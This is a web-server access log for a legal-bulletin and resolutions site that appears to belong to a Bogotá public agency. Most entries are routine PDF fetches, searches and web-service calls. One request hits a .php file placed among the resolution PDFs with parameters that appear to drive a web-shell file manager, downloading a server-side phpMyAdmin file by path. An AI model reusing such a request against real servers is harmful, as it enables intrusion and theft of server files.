172.22.2.4 - - [24/Jun/2024:07:38:58 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [24/Jun/2024:07:38:58 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [24/Jun/2024:07:38:58 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [24/Jun/2024:07:38:58 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [24/Jun/2024:07:38:58 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [24/Jun/2024:07:38:59 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
66.249.66.20 - - [24/Jun/2024:07:39:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/4509.pdf HTTP/1.1" 200 317696
172.22.2.4 - - [24/Jun/2024:07:39:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2024&resuelve=acotamiento HTTP/1.1" 200 626
66.249.66.19 - - [24/Jun/2024:07:39:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/1235.pdf HTTP/1.1" 200 938346
66.249.66.19 - - [24/Jun/2024:07:39:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/2105.pdf HTTP/1.1" 200 1859105
66.249.66.22 - - [24/Jun/2024:07:39:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/0204.pdf HTTP/1.1" 200 335320
201.245.192.253 - - [24/Jun/2024:07:39:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.23 - - [24/Jun/2024:07:39:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/2986.pdf HTTP/1.1" 200 378320
172.22.2.4 - - [24/Jun/2024:07:39:25 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1070&usuario=&sector=&fecha=2024&resuelve=acotamiento HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:39:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1070&usuario=&sector=&fecha=2024&resuelve=acotamiento HTTP/1.1" 200 626
66.249.66.20 - - [24/Jun/2024:07:39:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/2617.pdf HTTP/1.1" 200 386681
172.22.2.4 - - [24/Jun/2024:07:39:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1070&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:39:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1070&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:39:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1070&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:39:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1070&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 626
66.249.66.19 - - [24/Jun/2024:07:39:36 -0500] "GET /BLA/resoluciones/AUTOS%202020/4394.pdf HTTP/1.1" 200 391093
201.245.192.253 - - [24/Jun/2024:07:39:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37043
66.249.66.20 - - [24/Jun/2024:07:39:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/0288.pdf HTTP/1.1" 200 287378
172.22.2.4 - - [24/Jun/2024:07:39:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1070&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1248
172.22.2.4 - - [24/Jun/2024:07:39:42 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
152.203.251.31 - - [24/Jun/2024:07:39:45 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [24/Jun/2024:07:38:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [24/Jun/2024:07:39:48 -0500] "GET /BLA/resoluciones/AUTOS%202020/1443.pdf HTTP/1.1" 200 345487
66.249.66.19 - - [24/Jun/2024:07:39:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/4778.pdf HTTP/1.1" 200 349184
66.249.66.20 - - [24/Jun/2024:07:40:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/4930.pdf HTTP/1.1" 200 404593
66.249.66.19 - - [24/Jun/2024:07:40:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/1055.pdf HTTP/1.1" 200 360819
201.245.192.253 - - [24/Jun/2024:07:40:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [24/Jun/2024:07:40:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37041
66.249.66.20 - - [24/Jun/2024:07:40:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/3258.pdf HTTP/1.1" 200 334654
66.249.66.20 - - [24/Jun/2024:07:40:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/3873.pdf HTTP/1.1" 200 371833
201.245.192.253 - - [24/Jun/2024:07:40:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [24/Jun/2024:07:40:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/3695.pdf HTTP/1.1" 200 346047
172.22.2.4 - - [24/Jun/2024:07:40:28 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2304&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1155
172.22.2.4 - - [24/Jun/2024:07:40:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2304&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1155
66.249.66.20 - - [24/Jun/2024:07:40:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/4182.pdf HTTP/1.1" 200 329779
66.249.66.20 - - [24/Jun/2024:07:40:36 -0500] "GET /BLA/resoluciones/AUTOS%202020/1504.pdf HTTP/1.1" 200 1015699
191.156.61.222 - - [24/Jun/2024:07:40:37 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.156.59.202 - - [24/Jun/2024:07:40:37 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
191.156.61.222 - - [24/Jun/2024:07:40:37 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.156.61.206 - - [24/Jun/2024:07:40:37 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
172.22.2.4 - - [24/Jun/2024:07:38:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
186.155.43.93 - - [24/Jun/2024:07:40:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2304.pdf HTTP/1.1" 200 4328597
186.155.43.93 - - [24/Jun/2024:07:40:41 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.66.19 - - [24/Jun/2024:07:40:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/3647.pdf HTTP/1.1" 200 325308
191.156.61.206 - - [24/Jun/2024:07:40:43 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
191.156.61.206 - - [24/Jun/2024:07:40:45 -0500] "POST /appsia/controlador HTTP/1.1" 200 7730
191.156.61.206 - - [24/Jun/2024:07:40:46 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
66.249.66.19 - - [24/Jun/2024:07:40:48 -0500] "GET /BLA/resoluciones/AUTOS%202020/1579.pdf HTTP/1.1" 200 454296
66.249.66.19 - - [24/Jun/2024:07:40:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/1170.pdf HTTP/1.1" 200 347978
66.249.66.19 - - [24/Jun/2024:07:41:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/3119.pdf HTTP/1.1" 200 351826
66.249.66.20 - - [24/Jun/2024:07:41:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/2352.pdf HTTP/1.1" 200 339783
66.249.66.21 - - [24/Jun/2024:07:41:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/2312.pdf HTTP/1.1" 200 348947
66.249.66.21 - - [24/Jun/2024:07:41:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/1198.pdf HTTP/1.1" 200 1104664
201.245.192.253 - - [24/Jun/2024:07:41:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [24/Jun/2024:07:41:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/3552.pdf HTTP/1.1" 200 417902
66.249.66.20 - - [24/Jun/2024:07:41:29 -0500] "GET /BLA/resoluciones/AUTOS%202020/1211.pdf HTTP/1.1" 200 1126415
66.249.66.19 - - [24/Jun/2024:07:41:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/4344.pdf HTTP/1.1" 200 411624
66.249.66.19 - - [24/Jun/2024:07:41:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/1980.pdf HTTP/1.1" 200 442992
66.249.66.20 - - [24/Jun/2024:07:41:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/1440.pdf HTTP/1.1" 200 323430
66.249.66.20 - - [24/Jun/2024:07:41:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/1467.pdf HTTP/1.1" 200 370911
172.22.2.4 - - [24/Jun/2024:07:41:56 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2304&usuario=&sector=&fecha=2019&resuelve=Quebrada%20Chiguaza HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:41:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=Quebrada%20Chiguaza HTTP/1.1" 200 626
66.249.66.19 - - [24/Jun/2024:07:41:59 -0500] "GET /BLA/resoluciones/AUTOS%202020/4284.pdf HTTP/1.1" 200 420969
172.22.2.4 - - [24/Jun/2024:07:42:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=Quebrada%20Chiguaza HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:42:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=Quebrada%20Chiguaza HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:42:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=Quebrada%20Chiguaza HTTP/1.1" 200 626
66.249.66.19 - - [24/Jun/2024:07:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202020/2988.pdf HTTP/1.1" 200 378377
216.245.221.92 - - [24/Jun/2024:07:42:05 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [24/Jun/2024:07:42:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/4023.pdf HTTP/1.1" 200 380651
66.249.66.21 - - [24/Jun/2024:07:42:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0702.pdf HTTP/1.1" 200 26706291
201.245.192.253 - - [24/Jun/2024:07:42:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [24/Jun/2024:07:42:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/3375.pdf HTTP/1.1" 200 340302
66.249.66.20 - - [24/Jun/2024:07:42:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/2553.pdf HTTP/1.1" 200 365217
66.249.66.19 - - [24/Jun/2024:07:42:29 -0500] "GET /BLA/resoluciones/AUTOS%202020/3148.pdf HTTP/1.1" 200 354988
66.249.66.20 - - [24/Jun/2024:07:42:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/4409.pdf HTTP/1.1" 200 389480
47.128.124.173 - - [24/Jun/2024:07:42:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=File.class.php&ft=download HTTP/1.1" 200 19590
66.249.66.19 - - [24/Jun/2024:07:42:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/0024.pdf HTTP/1.1" 200 714729
66.249.66.19 - - [24/Jun/2024:07:42:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/0946.pdf HTTP/1.1" 200 479198
66.249.66.19 - - [24/Jun/2024:07:42:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/3181.pdf HTTP/1.1" 200 382020
66.249.66.19 - - [24/Jun/2024:07:42:59 -0500] "GET /BLA/resoluciones/AUTOS%202020/4676.pdf HTTP/1.1" 200 393595
66.249.66.19 - - [24/Jun/2024:07:43:05 -0500] "GET /BLA/resoluciones/AUTOS%202020/3696.pdf HTTP/1.1" 200 364245
66.249.66.21 - - [24/Jun/2024:07:43:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/1293.pdf HTTP/1.1" 200 396799
66.249.66.20 - - [24/Jun/2024:07:43:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/2639.pdf HTTP/1.1" 200 338178
201.245.192.253 - - [24/Jun/2024:07:43:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [24/Jun/2024:07:43:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/4348.pdf HTTP/1.1" 200 405232
66.249.66.19 - - [24/Jun/2024:07:43:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/1614.pdf HTTP/1.1" 200 444784
66.249.66.19 - - [24/Jun/2024:07:43:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/4183.pdf HTTP/1.1" 200 338572
66.249.66.19 - - [24/Jun/2024:07:43:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/2252.pdf HTTP/1.1" 200 394276
66.249.66.19 - - [24/Jun/2024:07:43:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/1265.pdf HTTP/1.1" 200 356461
66.249.66.19 - - [24/Jun/2024:07:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202020/3059.pdf HTTP/1.1" 200 384417
66.249.66.19 - - [24/Jun/2024:07:43:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/3815.pdf HTTP/1.1" 200 349874
66.249.66.20 - - [24/Jun/2024:07:44:04 -0500] "GET /BLA/resoluciones/AUTOS%202020/1046.pdf HTTP/1.1" 200 379250
172.22.2.4 - - [24/Jun/2024:07:44:08 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
66.249.66.20 - - [24/Jun/2024:07:44:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/1746.pdf HTTP/1.1" 200 962966
66.249.66.21 - - [24/Jun/2024:07:44:16 -0500] "GET /BLA/resoluciones/AUTOS%202020/0545.pdf HTTP/1.1" 200 292201
201.245.192.253 - - [24/Jun/2024:07:44:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [24/Jun/2024:07:44:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/2739.pdf HTTP/1.1" 200 420409
66.249.66.19 - - [24/Jun/2024:07:44:28 -0500] "GET /BLA/resoluciones/AUTOS%202020/2721.pdf HTTP/1.1" 200 321113
66.249.66.20 - - [24/Jun/2024:07:44:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/2227.pdf HTTP/1.1" 200 360128
66.249.66.19 - - [24/Jun/2024:07:44:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/3254.pdf HTTP/1.1" 200 355231
66.249.66.19 - - [24/Jun/2024:07:44:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/3565.pdf HTTP/1.1" 200 360798
66.249.66.19 - - [24/Jun/2024:07:44:52 -0500] "GET /BLA/resoluciones/AUTOS%202020/2438.pdf HTTP/1.1" 200 408766
66.249.66.19 - - [24/Jun/2024:07:44:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/4615.pdf HTTP/1.1" 200 392332
66.249.66.19 - - [24/Jun/2024:07:45:04 -0500] "GET /BLA/resoluciones/AUTOS%202020/4068.pdf HTTP/1.1" 200 515934
201.245.192.253 - - [24/Jun/2024:07:45:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.20 - - [24/Jun/2024:07:45:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/2090.pdf HTTP/1.1" 200 329701
52.167.144.137 - - [24/Jun/2024:07:45:15 -0500] "GET /BLA/resoluciones/AUTOS%202023/3100.pdf HTTP/1.1" 304 -
66.249.66.21 - - [24/Jun/2024:07:45:16 -0500] "GET /BLA/resoluciones/AUTOS%202020/3656.pdf HTTP/1.1" 200 355223
52.167.144.145 - - [24/Jun/2024:07:45:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/2676.pdf HTTP/1.1" 304 -
201.245.192.253 - - [24/Jun/2024:07:45:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [24/Jun/2024:07:45:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/0725.pdf HTTP/1.1" 200 322009
66.249.66.20 - - [24/Jun/2024:07:45:28 -0500] "GET /BLA/resoluciones/AUTOS%202020/1607.pdf HTTP/1.1" 200 530787
66.249.66.20 - - [24/Jun/2024:07:45:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/4790.pdf HTTP/1.1" 200 375064
172.22.2.4 - - [24/Jun/2024:07:45:36 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [24/Jun/2024:07:45:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [24/Jun/2024:07:43:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [24/Jun/2024:07:45:39 -0500] "GET /BLA/resoluciones/AUTOS%202024/00683.pdf HTTP/1.1" 200 426247
66.249.66.19 - - [24/Jun/2024:07:45:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/0463.pdf HTTP/1.1" 200 341037
66.249.66.19 - - [24/Jun/2024:07:45:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/4777.pdf HTTP/1.1" 200 375637
172.22.2.4 - - [24/Jun/2024:07:45:50 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=6445&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 626
66.249.66.19 - - [24/Jun/2024:07:45:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/1476.pdf HTTP/1.1" 200 946567
66.249.66.19 - - [24/Jun/2024:07:45:57 -0500] "GET /BLA/resoluciones/AUTOS%202020/3935.pdf HTTP/1.1" 200 1737818
66.249.66.21 - - [24/Jun/2024:07:46:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/0815.pdf HTTP/1.1" 200 375169
66.249.66.19 - - [24/Jun/2024:07:46:09 -0500] "GET /BLA/resoluciones/AUTOS%202020/4785.pdf HTTP/1.1" 200 382261
66.249.66.21 - - [24/Jun/2024:07:46:15 -0500] "GET /BLA/resoluciones/AUTOS%202020/4634.pdf HTTP/1.1" 200 346181
216.244.66.195 - - [24/Jun/2024:07:46:18 -0500] "GET /BLA/resoluciones/AUTOS%202024/01982.pdf HTTP/1.1" 200 405003
201.245.192.253 - - [24/Jun/2024:07:46:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [24/Jun/2024:07:46:21 -0500] "GET /BLA/resoluciones/AUTOS%202020/1468.pdf HTTP/1.1" 200 391998
66.249.66.19 - - [24/Jun/2024:07:46:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/1546.pdf HTTP/1.1" 200 810361
172.22.2.4 - - [24/Jun/2024:07:44:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.19 - - [24/Jun/2024:07:46:33 -0500] "GET /BLA/resoluciones/AUTOS%202020/4628.pdf HTTP/1.1" 200 348634
66.249.66.19 - - [24/Jun/2024:07:46:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/4773.pdf HTTP/1.1" 200 346928
66.249.66.20 - - [24/Jun/2024:07:46:45 -0500] "GET /BLA/resoluciones/AUTOS%202020/0934.pdf HTTP/1.1" 200 354503
66.249.66.20 - - [24/Jun/2024:07:46:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/1481.pdf HTTP/1.1" 200 609016
66.249.66.20 - - [24/Jun/2024:07:46:57 -0500] "GET /BLA/resoluciones/AUTOS%202020/3750.pdf HTTP/1.1" 200 360348
66.249.66.19 - - [24/Jun/2024:07:47:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/1517.pdf HTTP/1.1" 200 366092
216.245.221.92 - - [24/Jun/2024:07:47:05 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.19 - - [24/Jun/2024:07:47:09 -0500] "GET /BLA/resoluciones/AUTOS%202020/1618.pdf HTTP/1.1" 200 332382
66.249.66.20 - - [24/Jun/2024:07:47:15 -0500] "GET /BLA/resoluciones/AUTOS%202020/2034.pdf HTTP/1.1" 200 356098
201.245.192.253 - - [24/Jun/2024:07:47:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [24/Jun/2024:07:47:21 -0500] "GET /BLA/resoluciones/AUTOS%202020/0174.pdf HTTP/1.1" 200 275000
66.249.66.21 - - [24/Jun/2024:07:47:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/3637.pdf HTTP/1.1" 200 354846
216.244.66.195 - - [24/Jun/2024:07:47:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/2095.pdf HTTP/1.1" 200 1332686
66.249.66.19 - - [24/Jun/2024:07:47:33 -0500] "GET /BLA/resoluciones/AUTOS%202020/2643.pdf HTTP/1.1" 200 365912
66.249.66.19 - - [24/Jun/2024:07:47:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/4779.pdf HTTP/1.1" 200 366365
66.249.66.19 - - [24/Jun/2024:07:47:45 -0500] "GET /BLA/resoluciones/AUTOS%202020/0948.pdf HTTP/1.1" 200 2534862
66.249.66.21 - - [24/Jun/2024:07:47:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/1114.pdf HTTP/1.1" 200 399989
66.249.66.19 - - [24/Jun/2024:07:47:57 -0500] "GET /BLA/resoluciones/AUTOS%202020/4935.pdf HTTP/1.1" 200 394591
66.249.66.20 - - [24/Jun/2024:07:48:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/2906.pdf HTTP/1.1" 200 380382
66.249.66.22 - - [24/Jun/2024:07:48:09 -0500] "GET /BLA/resoluciones/AUTOS%202020/4202.pdf HTTP/1.1" 200 583156
52.167.144.137 - - [24/Jun/2024:07:48:14 -0500] "GET /Publicaciones/2024EE116291.pdf HTTP/1.1" 404 228
66.249.66.21 - - [24/Jun/2024:07:48:15 -0500] "GET /BLA/resoluciones/AUTOS%202020/3118.pdf HTTP/1.1" 200 351516
201.245.192.253 - - [24/Jun/2024:07:48:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [24/Jun/2024:07:48:20 -0500] "GET /BLA/resoluciones/AUTOS%202020/4610.pdf HTTP/1.1" 200 354778
66.249.66.21 - - [24/Jun/2024:07:48:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/2186.pdf HTTP/1.1" 200 393093
66.249.66.19 - - [24/Jun/2024:07:48:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/2103.pdf HTTP/1.1" 200 1033687
66.249.66.19 - - [24/Jun/2024:07:48:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/0765.pdf HTTP/1.1" 200 415583
66.249.66.20 - - [24/Jun/2024:07:48:44 -0500] "GET /BLA/resoluciones/AUTOS%202020/4404.pdf HTTP/1.1" 200 400545
172.22.2.4 - - [24/Jun/2024:07:48:47 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
66.249.66.19 - - [24/Jun/2024:07:48:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/2355.pdf HTTP/1.1" 200 336023
66.249.66.19 - - [24/Jun/2024:07:48:56 -0500] "GET /BLA/resoluciones/AUTOS%202020/3957.pdf HTTP/1.1" 200 385150
66.249.66.20 - - [24/Jun/2024:07:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/3280.pdf HTTP/1.1" 200 426193
66.249.66.21 - - [24/Jun/2024:07:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202020/3592.pdf HTTP/1.1" 200 401116
172.22.2.4 - - [24/Jun/2024:07:49:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679%20&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 626
66.249.66.21 - - [24/Jun/2024:07:49:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/2754.pdf HTTP/1.1" 200 355180
172.22.2.4 - - [24/Jun/2024:07:49:15 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [24/Jun/2024:07:49:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [24/Jun/2024:07:49:20 -0500] "GET /BLA/resoluciones/AUTOS%202020/1295.pdf HTTP/1.1" 200 361619
66.249.66.20 - - [24/Jun/2024:07:49:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/4862.pdf HTTP/1.1" 200 417061
172.22.2.4 - - [24/Jun/2024:07:49:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
66.249.66.20 - - [24/Jun/2024:07:49:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/2789.pdf HTTP/1.1" 200 344166
172.22.2.4 - - [24/Jun/2024:07:49:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
